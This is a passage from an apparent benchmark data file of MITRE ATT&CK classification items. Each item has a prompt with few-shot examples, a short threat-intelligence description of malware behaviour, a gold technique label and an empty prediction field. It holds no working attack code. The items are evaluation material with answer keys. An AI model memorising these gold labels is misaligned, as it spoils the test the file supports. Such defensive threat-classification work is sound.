JavaScript code to initiate malware execution.\n\t - T1027.006: Obfuscated Files or Information - HTML Smuggling\n- Text: Kimsuky has used FTP to download additional malware to the target machine.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n", + "input": "HermeticWiper can initiate a system shutdown.", + "gold": "- T1529: System Shutdown/Reboot", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: may collect information about the system by running hostname and systeminfo on a victim.\n\t - T1082: System Information Discovery\n- Text: Mitigation As this sample installs itself through the use of EternalBlue, the targeted protocol is SMB. Because of this, in order to best mitigate and avoid possible installations, you need your system updated to the latest security patches. Specifically, you\u2019d want to make sure that you have MS17-010 installed, as this is the security patch that patches the EternalBlue vulnerability\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: macOS.OSAMiner can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "ObliqueRAT has the ability to check for blocklisted computer names on infected endpoints.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Anchor can execute payloads via shell scripting.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.\n\t - T1609: Container Administration Command\n- Text: Command Number \u2013 a running index number to keep track of executed commands. If set to any number other than -1, the backdoor should proceed to execute the command, according to the Command ID. Command ID \u2013 can be one of the following commands: 101 \u2013 Shell Command: execute the Shell command attached in the {Arg1} argument. 102 \u2013 Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 \u2013 Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument. 101 \u2013 Shell Command: execute the Shell command attached in the {Arg1} argument. 102 \u2013 Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 \u2013 Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Hildegard has used shell scripts for execution.", + "gold": "- T1059.004: Command and Scripting Interpreter - Unix Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZxShell.dll is injected in a shared SVCHOST process. The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: has a command to download an .exe and use process hollowing to inject it into a new process.\n\t - T1055.012: Process Injection - Process Hollowing\n- Text: Avenger has the ability to inject shellcode into svchost.exe.\n\t - T1055: Process Injection\n", + "input": "TA505 has been seen injecting a DLL into winword.exe.", + "gold": "- T1055.001: Process Injection - Dynamic-link Library Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire can find shared drives on the local system.\n\t - T1135: Network Share Discovery\n- Text: CosmicDuke steals user files from network shared drives with file extensions and keywords that match a predefined list.\n\t - T1039: Data from Network Shared Drive\n- Text: H1N1 has functionality to copy itself to network shares.\n\t - T1080: Taint Shared Content\n", + "input": "Sowbug listed remote shared drives that were accessible from a victim.", + "gold": "- T1135: Network Share Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TrickBot has been known to reach a command and control server via one of nine proxy IP addresses.\n\t - T1090.002: Proxy - External Proxy\n- Text: QuasarRAT can communicate over a reverse proxy using SOCKS5.\n\t - T1090: Proxy\n- Text: Heyoka Backdoor can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers.\n\t - T1572: Protocol Tunneling\n", + "input": "ShimRat can use pre-configured HTTP proxies.", + "gold": "- T1090.002: Proxy - External Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.\n\t - T1547.008: Boot or Logon Autostart Execution - LSASS Driver\n- Text: registers itself as a service by adding several Registry keys.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: A version of KONNI has dropped a Windows shortcut into the Startup folder to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", + "input": "Naid creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LBTWiz32.exe that is run is a normal program. However, the malicious DLL (LBTServ.dll) created on the same path through DLL hijacking is loaded and starts operating. The malicious DLL creates and executes a malicious VBE file (ReVBShell) in the %TEMP% folder. Figures 2 to 4 show parts of the decoded VBE code.\n\t - T1574: Hijack Execution Flow\n- Text: Lazarus Group has abused the \"KernelCallbackTable\" to hijack process control flow and execute shellcode.\n\t - T1574.013: Hijack Execution Flow - KernelCallbackTable\n- Text: One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.\n\t - T1574.010: Hijack Execution Flow - Services File Permissions Weakness\n", + "input": "One of Dtrack can replace the normal flow of a program execution with malicious code.", + "gold": "- T1574: Hijack Execution Flow", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HenBox attempts to hide itself from the app launcher view by running the following code, passing the parameters COMPONENT_ENABLED_STATE_DISABLED (2) and DONT_KILL_APP (1) to the setComponentEnabledSetting() method.\n\t - T1564: Hide Artifacts\n- Text: PipeMon installer can use UAC bypass techniques to install the payload.\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: Lazarus Group has abused the \"KernelCallbackTable\" to hijack process control flow and execute shellcode.\n\t - T1574.013: Hijack Execution Flow - KernelCallbackTable\n", + "input": "WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it's attempts to elevate privileges through `IFileOperation`.", + "gold": "- T1564: Hide Artifacts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ThreatNeedle can save its configuration data as the following RC4-encrypted Registry key: `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`.\n\t - T1112: Modify Registry\n- Text: UNC2452 removed evidence of email export requests using \"Remove-MailboxExportRequest\". They temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.\n\t - T1070: Indicator Removal\n- Text: Calisto uses a hidden directory named .calisto to store data from the victim\u2019s machine before exfiltration.\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "DarkWatchman can store configuration strings, keylogger, and output of components in the Registry.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly 2.0 has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.\n\t - T1187: Forced Authentication\n- Text: Remote templates are a feature of Microsoft Word which allow a document to load a template to be used in a document \u2013 this template can be externally hosted, either on a file share, or on the internet. The template is then loaded when the document is opened. The Inception attackers use this feature in a malicious context as shown in Figure 1 below\n\t - T1221: Template Injection\n- Text: Kazuar adds a .lnk file to the Windows startup folder.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n", + "input": "Dragonfly 2.0 manipulated .lnk files to gather user credentials in conjunction with Forced Authentication.", + "gold": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After execution of every task, the malware sleeps for one minute before executing the next task\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Higaisa named a shellcode loader binary \"svchast.exe\" to spoof the legitimate \"svchost.exe\".\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "Bazar can create a scheduled task for persistence.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DEATHRANSOM creates an RSA-2048 public and private key pair. The shared secret is SHA256 hashed and used as the key to Salsa20 encrypt the RSA public and private keys. The RSA public key is used to encrypt the individual symmetric keys that are used to encrypt each file. A Base64 encoded version of the encrypted RSA keys and the victim\u2019s Curve25519 public key is included in the ransom note, providing the threat actors the information needed to decrypt the victim's files. For the symmetric key, DEATHRANSOM calls RtlGenRandom to generate 32 random bytes. This is the 32 byte key used to AES encrypt each file. After the file is encrypted, the AES key is encrypted with the public RSA key and appended to the file. DEATHRANSOM lastly appends the four magic bytes of AB CD EF AB at the end of the encrypted file and uses this as a check to ensure that it does not encrypt an already encrypted file. The analyzed DEATHRANSOM sample used for comparison does not change the file extension\n\t - T1486: Data Encrypted for Impact\n- Text: has deployed a bootkit along with to ensure its persistence on the victim. The bootkit shares code with some variants of .\n\t - T1542.003: Pre-OS Boot - Bootkit\n- Text: Daserf hides collected data in password-protected .rar archives.\n\t - T1560: Archive Collected Data\n\t - T1560.001: Archive Collected Data - Archive via Utility\n", + "input": "APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.", + "gold": "- T1486: Data Encrypted for Impact", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kerrdown has gained execution through victims opening malicious files.\n\t - T1204.002: User Execution - Malicious File\n- Text: TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note\n\t - T1204.001: User Execution - Malicious Link\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", + "input": "FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kazuar captures images from the webcam.\n\t - T1125: Video Capture\n- Text: Returns the screenshot to the C2 via:
111 startTakeScreenShot Creates a thread to take a screenshot at a set interval (default: every 10 seconds)\n\t - T1113: Screen Capture\n- Text: The payload has a function it calls early on that tests to see which DNS query types are able to successfully reach the C2 server. It iterates through a list of types and the first DNS type to receive a response from the C2 server will be used for all communications between the payload and the C2 server, which are in the following order (editor\u2019s note: AC is not a DNS record type but is a mode where the trojan will perform a request for an A record requiring ac as a subdomain): A AAAA AC \u2013 (see note above) CNAME MX TXT SRV SOA The payload uses the built-in Windows nslookup application with specific parameters and specially crafted subdomains to communicate with the C2\n\t - T1123: Audio Capture\n\t - T1071: Application Layer Protocol\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1008: Fallback Channels\n", + "input": "Revenge RAT has the ability to access the webcam.", + "gold": "- T1125: Video Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BLACKCOFFEE has the capability to discover processes.\n\t - T1057: Process Discovery\n- Text: While the seller specifies that HawkEye Reborn should only be used on systems with permission, they also explicitly forbid scanning of HawkEye Reborn executables using antivirus software, likely an attempt to minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries.Following these changes, the new developer of HawkEye Reborn has continued to make changes and we expect this to continue as long as the developer can monetize their efforts.As with other malware that we wrote about last year, while the developer claims that the software should only be used on systems with permission, or \"for educational purposes,\" malicious attackers have been continuously leveraging it against various targets around the world.Distribution campaignsFor several months during the last half of 2018 and continuing into 2019, Cisco Talos has observed ongoing malicious email campaigns that are being used to distribute versions of the HawkEye Reborn keylogger/stealer\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1018: Remote System Discovery\n- Text: HotCroissant has the ability to retrieve a list of services on the infected host.\n\t - T1007: System Service Discovery\n", + "input": "During Frankenstein, the threat actors used Empire to obtain a list of all running processes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FELIXROOT checks for installed security software like antivirus and firewall.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Pupy has a module that checks a number of indicators on the system to determine if its running on a virtual machine.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: After an initial dormant period of up to two weeks, it retrieves and executes commands, called \u201cJobs\u201d, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n", + "input": "SpicyOmelette can check for the presence of 29 different antivirus tools.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Duqu has used \"msiexec\" to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n- Text: installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Winexe installs a service on the remote system, executes the command, then uninstalls the service.\n\t - T1569.002: System Services - Service Execution\n", + "input": "RemoteUtilities can use Msiexec to install a service.", + "gold": "- T1218.007: System Binary Proxy Execution - Msiexec", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ragnar Locker has used regsvr32.exe to execute components of VirtualBox.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: APT28 has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server.\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n", + "input": "Deep Panda has used regsvr32.exe to execute a server variant of Derusbi in victim networks.", + "gold": "- T1218.010: System Binary Proxy Execution - Regsvr32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Matryoshka is capable of stealing Outlook passwords.\n\t - T1555: Credentials from Password Stores\n- Text: This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy)\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n- Text: Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials.\n\t - T1078: Valid Accounts\n\t - T1114.002: Email Collection - Remote Email Collection\n", + "input": "Evilnum can collect email credentials from victims.", + "gold": "- T1555: Credentials from Password Stores", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AppleSeed has exfiltrated files using web services.\n\t - T1567: Exfiltration Over Web Service\n- Text: Frankenstein has collected information via Empire, which is automatically sent the data back to the adversary's C2.\n\t - T1020: Automated Exfiltration\n\t - T1041: Exfiltration Over C2 Channel\n- Text: UNC2452 staged data and files in password-protected archives on a victim's OWA server.\n\t - T1074.002: Data Staged - Remote Data Staging\n", + "input": "Ngrok has been used by threat actors to configure servers for data exfiltration.", + "gold": "- T1567: Exfiltration Over Web Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 59 60 61 62 freeimage_32.dll freeimageplus_32.dll freeimage_64.dll freeimageplus_64.dll FreeImage open source library supports popular graphics image formats (ver 3.15.4 2012-10-27) (http://freeimage.sourceforge.net)\n\t - T1055: Process Injection\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1027: Obfuscated Files or Information\n- Text: Once the user enters the targeted website, the attacker is notified and can take over the device remotely. As the victim accesses their online banking account, the attacker can display full-screen overlay images (hence the name \u201cremote overlay\u201d) designed to appear like they are part of the bank\u2019s website. These pages can either block the victim\u2019s access to the site, allowing the attacker to move money after initial authentication, or include additional data fields that the user is prompted to fill out\n\t - T1185: Browser Session Hijacking\n", + "input": "Dyre has the ability to directly inject its code into the web browser process.", + "gold": "- T1055: Process Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Leviathan has used WMI for persistence.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: DEATHRANSOM, HELLOKITTY, and FIVEHANDS use the same code to delete volume shadow copies via WMI by performing the query select * from Win32_ShadowCopy and then deleting each instance returned by its id\n\t - T1047: Windows Management Instrumentation\n\t - T1490: Inhibit System Recovery\n\t - T1490: Inhibit System Recovery\n\t - T1490: Inhibit System Recovery\n\t - T1047: Windows Management Instrumentation\n\t - T1047: Windows Management Instrumentation\n- Text: QakBot can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "Leviathan has used WMI for execution.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WastedLocker can execute itself as a service.\n\t - T1569.002: System Services - Service Execution\n- Text: Trickbot is installed as a scheduled task, using names like \u201cWinDotNet,\u201d \u201cGoogleTask,\u201d or \u201cSysnetsf\u201d to masquerade as legitimate-appearing processes. These point to various copies of TrickBot installed in the system, usually within the user profile under %USER_DIR%\\AppData\\Roaming\\ or a subdirectory. The subdirectories also use similarly misleading names like \u201cWinDefrag\u201d or \u201cNetSocket\u201d to appear innocuous. TrickBot may also be installed as a service with names like \u201cControlServiceA\u201d that points to a copy in the system drive root\n\t - T1543.003: Create or Modify System Process - Windows Service\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: LAPSUS$ has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets.\n\t - T1578.002: Modify Cloud Compute Infrastructure - Create Cloud Instance\n", + "input": "ZxShell can create a new service for execution.", + "gold": "- T1569.002: System Services - Service Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: FunnyDream can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: GoldMax has impersonated systems management software to avoid detection.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "Kimsuky has downloaded additional malware with scheduled tasks.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT41 attempted to remove evidence of some of its activity by deleting Bash histories.\n\t - T1070.003: Indicator Removal - Clear Command History\n- Text: 